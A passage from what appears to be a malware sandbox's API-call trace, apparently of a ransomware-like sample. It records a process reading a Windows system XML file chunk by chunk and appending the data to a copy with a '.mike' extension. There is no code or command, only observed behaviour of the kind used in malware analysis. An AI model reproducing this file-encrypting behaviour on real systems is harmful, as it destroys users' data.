lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xa220 [0042.632] WriteFile (in: hFile=0x264, lpBuffer=0x21133b0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21133b0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.632] CloseHandle (hObject=0x264) returned 1 [0042.633] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.633] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.634] GetFileType (hFile=0x264) returned 0x1 [0042.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.634] GetFileType (hFile=0x264) returned 0x1 [0042.634] SetFilePointer (in: hFile=0x264, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xc800 [0042.634] ReadFile (in: hFile=0x264, lpBuffer=0x2115df0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2115df0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.634] CloseHandle (hObject=0x264) returned 1 [0042.635] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.635] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.635] GetFileType (hFile=0x264) returned 0x1 [0042.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.635] GetFileType (hFile=0x264) returned 0x1 [0042.635] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xca20 [0042.635] WriteFile (in: hFile=0x264, lpBuffer=0x2120358*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2120358*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.635] CloseHandle (hObject=0x264) returned 1 [0042.636] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.636] GetFileType (hFile=0x264) returned 0x1 [0042.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.636] GetFileType (hFile=0x264) returned 0x1 [0042.636] SetFilePointer (in: hFile=0x264, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xf000 [0042.637] ReadFile (in: hFile=0x264, lpBuffer=0x2122d98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2122d98*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.637] CloseHandle (hObject=0x264) returned 1 [0042.644] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.644] GetFileType (hFile=0x264) returned 0x1 [0042.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.644] GetFileType (hFile=0x264) returned 0x1 [0042.644] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xf220 [0042.644] WriteFile (in: hFile=0x264, lpBuffer=0x212d300*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x212d300*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.644] CloseHandle (hObject=0x264) returned 1 [0042.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.648] GetFileType (hFile=0x264) returned 0x1 [0042.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.649] GetFileType (hFile=0x264) returned 0x1 [0042.649] ReadFile (in: hFile=0x264, lpBuffer=0x212fd40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x212fd40*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.649] CloseHandle (hObject=0x264) returned 1 [0042.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.650] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.650] GetFileType (hFile=0x264) returned 0x1 [0042.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.650] GetFileType (hFile=0x264) returned 0x1 [0042.650] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x11a20 [0042.650] WriteFile (in: hFile=0x264, lpBuffer=0x213a2a8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x213a2a8*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.650] CloseHandle (hObject=0x264) returned 1 [0042.651] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.652] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.652] GetFileType (hFile=0x264) returned 0x1 [0042.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.652] GetFileType (hFile=0x264) returned 0x1 [0042.652] ReadFile (in: hFile=0x264, lpBuffer=0x213cce8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x213cce8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.652] CloseHandle (hObject=0x264) returned 1 [0042.653] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.653] GetFileType (hFile=0x264) returned 0x1 [0042.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.653] GetFileType (hFile=0x264) returned 0x1 [0042.653] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x14220 [0042.653] WriteFile (in: hFile=0x264, lpBuffer=0x2147250*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2147250*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.653] CloseHandle (hObject=0x264) returned 1 [0042.654] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.655] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.655] GetFileType (hFile=0x264) returned 0x1 [0042.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.655] GetFileType (hFile=0x264) returned 0x1 [0042.655] ReadFile (in: hFile=0x264, lpBuffer=0x2149c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2149c90*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.655] CloseHandle (hObject=0x264) returned 1 [0042.656] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.656] GetFileType (hFile=0x264) returned 0x1 [0042.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.656] GetFileType (hFile=0x264) returned 0x1 [0042.656] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x16a20 [0042.656] WriteFile (in: hFile=0x264, lpBuffer=0x21541f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21541f8*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.656] CloseHandle (hObject=0x264) returned 1 [0042.658] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.658] GetFileType (hFile=0x264) returned 0x1 [0042.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.658] GetFileType (hFile=0x264) returned 0x1 [0042.658] ReadFile (in: hFile=0x264, lpBuffer=0x2156c38, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2156c38*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.658] CloseHandle (hObject=0x264) returned 1 [0042.659] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.659] GetFileType (hFile=0x264) returned 0x1 [0042.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.659] GetFileType (hFile=0x264) returned 0x1 [0042.659] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x19220 [0042.659] WriteFile (in: hFile=0x264, lpBuffer=0x21611a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21611a0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.659] CloseHandle (hObject=0x264) returned 1 [0042.660] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.661] GetFileType (hFile=0x264) returned 0x1 [0042.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.661] GetFileType (hFile=0x264) returned 0x1 [0042.661] ReadFile (in: hFile=0x264, lpBuffer=0x2163be0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2163be0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.661] CloseHandle (hObject=0x264) returned 1 [0042.661] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.661] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.662] GetFileType (hFile=0x264) returned 0x1 [0042.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.662] GetFileType (hFile=0x264) returned 0x1 [0042.662] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x1ba20 [0042.662] WriteFile (in: hFile=0x264, lpBuffer=0x216e148*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x216e148*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.662] CloseHandle (hObject=0x264) returned 1 [0042.663] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.664] GetFileType (hFile=0x264) returned 0x1 [0042.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.664] GetFileType (hFile=0x264) returned 0x1 [0042.664] ReadFile (in: hFile=0x264, lpBuffer=0x2170b88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2170b88*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.664] CloseHandle (hObject=0x264) returned 1 [0042.665] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.665] GetFileType (hFile=0x264) returned 0x1 [0042.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.665] GetFileType (hFile=0x264) returned 0x1 [0042.665] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x1e220 [0042.666] WriteFile (in: hFile=0x264, lpBuffer=0x217b0f0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x217b0f0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.666] CloseHandle (hObject=0x264) returned 1 [0042.667] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.667] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.667] GetFileType (hFile=0x264) returned 0x1 [0042.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.667] GetFileType (hFile=0x264) returned 0x1 [0042.667] ReadFile (in: hFile=0x264, lpBuffer=0x217db30, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x217db30*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.668] CloseHandle (hObject=0x264) returned 1 [0042.669] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.669] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.669] GetFileType (hFile=0x264) returned 0x1 [0042.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.669] GetFileType (hFile=0x264) returned 0x1 [0042.669] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x20a20 [0042.669] WriteFile (in: hFile=0x264, lpBuffer=0x2188098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2188098*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.670] CloseHandle (hObject=0x264) returned 1 [0042.671] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.671] GetFileType (hFile=0x264) returned 0x1 [0042.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.671] GetFileType (hFile=0x264) returned 0x1 [0042.671] ReadFile (in: hFile=0x264, lpBuffer=0x218aad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x218aad8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.672] CloseHandle (hObject=0x264) returned 1 [0042.673] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.673] GetFileType (hFile=0x264) returned 0x1 [0042.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.673] GetFileType (hFile=0x264) returned 0x1 [0042.673] SetFilePointer (in: hFile=0x264, 